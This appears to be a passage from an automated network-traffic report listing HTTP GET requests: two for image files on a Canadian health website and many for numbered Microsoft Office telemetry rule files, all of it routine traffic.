                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-11/Group%209826%20%281%29.png?itok=xYH_8dLj HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-12/Group%209825%20%282%29.png?itok=vf0UJVIa HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120600v5s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
